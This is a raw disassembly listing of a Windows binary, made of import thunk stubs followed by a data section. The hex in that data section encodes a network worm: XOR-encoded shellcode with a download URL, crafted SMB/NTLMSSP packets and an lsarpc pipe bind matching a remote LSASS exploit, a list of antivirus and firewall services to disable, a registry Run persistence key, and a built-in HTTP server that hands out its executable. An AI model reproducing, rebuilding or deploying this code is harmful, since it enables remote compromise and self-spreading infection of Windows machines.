xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_440681 endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406AD proc near ; CODE XREF: .text:0043F53C�p
jmp dword ptr loc_4052A8
sub_4406AD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406B9 proc near ; CODE XREF: sub_4405FD+5�p
jmp dword ptr loc_4052A8+4
sub_4406B9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406C5 proc near ; CODE XREF: sub_4403F5+91�p
jmp dword ptr loc_4052B0
sub_4406C5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406D1 proc near ; CODE XREF: .text:0043F544�p
jmp dword ptr loc_4052B2+2
sub_4406D1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406DD proc near ; CODE XREF: sub_4405FD+51�p
jmp dword ptr loc_4052B2+6
sub_4406DD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406E9 proc near ; CODE XREF: .text:0043F574�p
; .text:0043F618�p ...
jmp dword ptr loc_4052B9+3
sub_4406E9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406F5 proc near ; CODE XREF: .text:0043FDCC�p
jmp dword ptr loc_4052C0
sub_4406F5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440701 proc near ; CODE XREF: sub_440080+4�p
jmp dword ptr loc_4052C0+4
sub_440701 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44070D proc near ; CODE XREF: sub_43F2D4+1E�p
jmp dword ptr loc_4052C7+1
sub_44070D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440719 proc near ; CODE XREF: .text:0043F512�p
; .text:004403C2�p
jmp dword ptr loc_4052C7+5
sub_440719 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440725 proc near ; CODE XREF: .text:0043F4B6�p
jmp dword ptr loc_4052CE+2
sub_440725 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440731 proc near ; CODE XREF: .text:0043F551�p
; .text:0043FDE4�p
jmp dword ptr loc_4052CE+6
sub_440731 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44073D proc near ; CODE XREF: .text:0043F52E�p
jmp dword ptr loc_4052D6+2
sub_44073D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440749 proc near ; CODE XREF: .text:0043F56E�p
jmp dword ptr loc_4052D6+6
sub_440749 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440755 proc near ; CODE XREF: sub_43F017+13�p
jmp dword ptr loc_4052DD+3
sub_440755 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440761 proc near ; CODE XREF: .text:0043F58C�p
; sub_43F725+17E�p
jmp dword ptr loc_4052E4
sub_440761 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44076D proc near ; CODE XREF: .text:0043F4AA�p
; .text:0043F4E4�p ...
jmp dword ptr loc_4052E4+4
sub_44076D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440779 proc near ; CODE XREF: sub_43F725+72�p
jmp dword ptr loc_4052E4+8
sub_440779 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440785 proc near ; CODE XREF: sub_43F725+BB�p
; sub_43F725+D9�p ...
jmp dword ptr loc_4052EE+2
sub_440785 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440791 proc near ; CODE XREF: .text:0043F612�p
; .text:004400DA�p ...
jmp dword ptr loc_4052F3+1
sub_440791 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44079D proc near ; CODE XREF: sub_440126+185�p
jmp dword ptr loc_4052F5+3
sub_44079D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407A9 proc near ; CODE XREF: sub_4403F5+108�p
jmp dword ptr loc_405302+2
sub_4407A9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407B5 proc near ; CODE XREF: sub_4403F5+60�p
jmp dword ptr loc_405308
sub_4407B5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407C1 proc near ; CODE XREF: sub_4403F5+12B�p
jmp dword ptr loc_405309+3
sub_4407C1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407CD proc near ; CODE XREF: sub_4403F5+113�p
jmp dword ptr loc_405310
sub_4407CD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407D9 proc near ; CODE XREF: sub_4403F5+11C�p
jmp dword ptr loc_405311+3
sub_4407D9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407E5 proc near ; CODE XREF: .text:004403CB�p
jmp dword ptr loc_405318
sub_4407E5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407F1 proc near ; CODE XREF: sub_4403F5+87�p
jmp dword ptr loc_40531A+2
sub_4407F1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407FD proc near ; CODE XREF: .text:004403D8�p
jmp dword ptr loc_405320
sub_4407FD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440809 proc near ; CODE XREF: .text:004403EB�p
jmp dword ptr loc_405320+4
sub_440809 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440815 proc near ; CODE XREF: sub_440126+C5�p
; sub_440126+205�p
jmp dword ptr loc_40532D+3
sub_440815 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440821 proc near ; CODE XREF: sub_440126+6F�p
; sub_440126+82�p
jmp dword ptr loc_405332+2
sub_440821 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44082D proc near ; CODE XREF: sub_440126+BF�p
jmp dword ptr loc_405337+1
sub_44082D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440839 proc near ; CODE XREF: sub_440126+2C�p
jmp dword ptr loc_405339+3
sub_440839 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440845 proc near ; CODE XREF: sub_440126+59�p
jmp dword ptr loc_405340
sub_440845 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440851 proc near ; CODE XREF: sub_440126+1F5�p
jmp dword ptr loc_405340+4
sub_440851 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44085D proc near ; CODE XREF: sub_43F2F9+21�p
jmp dword ptr loc_405347+1
sub_44085D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440869 proc near ; CODE XREF: sub_43F2F9+4B�p
; sub_43F364+40�p ...
jmp dword ptr loc_405347+5
sub_440869 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440875 proc near ; CODE XREF: sub_43F364+16�p
; sub_440126+1D1�p
jmp dword ptr loc_405350
sub_440875 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440881 proc near ; CODE XREF: sub_43F364+36�p
jmp dword ptr loc_405350+4
sub_440881 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44088D proc near ; CODE XREF: sub_43F2F9+41�p
jmp dword ptr loc_405355+3
sub_44088D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440899 proc near ; CODE XREF: sub_43F239+15�p
jmp dword ptr loc_405363+1
sub_440899 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408A5 proc near ; CODE XREF: .text:0043F1FF�p
jmp dword ptr loc_405366+2
sub_4408A5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408B1 proc near ; CODE XREF: .text:0043FE0E�p
; .text:0043FE48�p ...
jmp dword ptr loc_40536B+1
sub_4408B1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408BD proc near ; CODE XREF: .text:0043F22A�p
jmp dword ptr loc_40536B+5
sub_4408BD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408C9 proc near ; CODE XREF: sub_43F725+B2�p
; sub_43F725+D0�p ...
jmp dword ptr loc_405372+2
sub_4408C9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408D5 proc near ; CODE XREF: sub_43F725+16D�p
; sub_43F725+2E4�p ...
jmp dword ptr loc_405372+6
sub_4408D5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408E1 proc near ; CODE XREF: .text:0043F180�p
jmp dword ptr loc_405379+3
sub_4408E1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408ED proc near ; CODE XREF: sub_43F624:loc_43F64D�p
; sub_43F624:loc_43F6A7�p ...
jmp dword ptr loc_40537F+1
sub_4408ED endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408F9 proc near ; CODE XREF: .text:0043F139�p
; .text:0043F153�p ...
jmp dword ptr loc_40537F+5
sub_4408F9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440905 proc near ; CODE XREF: .text:0043F43F�p
; sub_43F624+F4�p ...
jmp dword ptr loc_405385+3
sub_440905 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440911 proc near ; CODE XREF: .text:0043FDD2�p
jmp dword ptr loc_405385+7
sub_440911 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44091D proc near ; CODE XREF: sub_43F239+6B�p
; sub_43F239+8E�p ...
jmp dword ptr loc_40538F+1
sub_44091D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440929 proc near ; CODE XREF: sub_4405FD+17�p
jmp dword ptr loc_40538F+5
sub_440929 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440935 proc near ; CODE XREF: .text:0043F3F0�p
; .text:0043F40C�p
jmp dword ptr loc_405396+2
sub_440935 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
dd 17h dup(0)
dd 40300000h, 40311000h, 800000h, 22h dup(0)
dd 5000h, 0
dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah
dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh
dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah
dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h
dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h
dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h
dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh
dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h
dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h
dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h
dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h
dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h
dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h
dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh
dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h
dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch
dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h
dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h
dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h
dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h
dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh
dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h)
dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0)
dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0
dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh
dd 100h, 8829700h, 0E0h, 3 dup(0)
dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h
dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h
dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0
dd 0FFDA0000h, 73424D53h, 0
dd 0C80718h, 3 dup(0)
dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0
dd 570000h, 0
dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h
dd 0
dd 470000h, 0
dd 400000h, 0
dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h
dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h
dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h
dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h
dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h
dd 30002E00h, 2 dup(0)
dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0)
dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h
dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh
dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h
dd 0A2424D53h, 0
dd 0C80718h, 3 dup(0)
dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0
dd 9F000000h, 201h, 2 dup(0)
dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h
dd 73006C00h, 72006100h, 63007000h, 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h
dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0)
dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0)
dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h
dd 5C004500h, 0
dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h
dd 0
dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h
dd 0
dd 0C80718h, 3 dup(0)
db 8, 0FFh
dw 0FEh
dd 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h, 8FFFFh, 10B8h
dd 4010B8h, 0
dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h
dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh
dd 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 10h dup(0)
dd 460000h, 101h, 0Dh dup(0)
dd 15123C00h, 275h, 0Dh dup(0)
dd 1C123C00h, 75h, 0Eh dup(0)
dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h
dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h
dd 404CCF00h, 200h, 80h, 0
dd 404CB500h, 0
dd 404C9C00h, 2 dup(0)
dd 404C8C00h, 2 dup(0)
dd 404C8200h, 2 dup(0)
dd 404C6900h, 2 dup(0)
dd 404C5000h, 2 dup(0)
dd 404C4300h, 2 dup(0)
dd 404C3300h, 100h, 0
dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0
dd 404C1900h, 2 dup(0)
dd 404C1200h, 100h, 0
dd 404C0C00h, 100h, 0
dd 404C0300h, 100h, 0
dd 404BFC00h, 100h, 0
dd 404BF300h, 100h, 0
dd 404BEC00h, 100h, 0
dd 404BE500h, 100h, 0
dd 404BDD00h, 100h, 0
dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0
dd 404BC800h, 100h, 0
dd 404BC100h, 100h, 0
dd 404BBB00h, 100h, 0
dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0
dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0
dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h
dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h
dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h
dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h
dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h
dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h
dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h
dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch
dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h
dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h
dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h
dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h
dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh
dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh
dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h
dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h
dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah
dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh
dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h
dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h
dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch
dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h
dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh
dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h
dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh
dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch
dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h
dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0)
dd 50F400h, 2 dup(0)
dd 57F400h, 524C00h, 513800h, 2 dup(0)
dd 583C00h, 529000h, 514400h, 2 dup(0)
dd 584C00h, 529C00h, 515000h, 2 dup(0)
dd 585C00h, 52A800h, 51AC00h, 2 dup(0)
dd 58C000h, 530400h, 51D800h, 2 dup(0)
dd 58F000h, 533000h, 520C00h, 2 dup(0)
dd 592C00h, 536400h, 1Ah dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 2 dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 0
dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h
dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h
dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h
dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h
dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h
dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h
dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h
dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h
dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h
dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h
dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h
dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h
dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h
dd 65736F6Ch, 646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h
dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h
dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h
dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h
dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h
dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh
dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h
dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h
dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h
dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h
dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h
dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
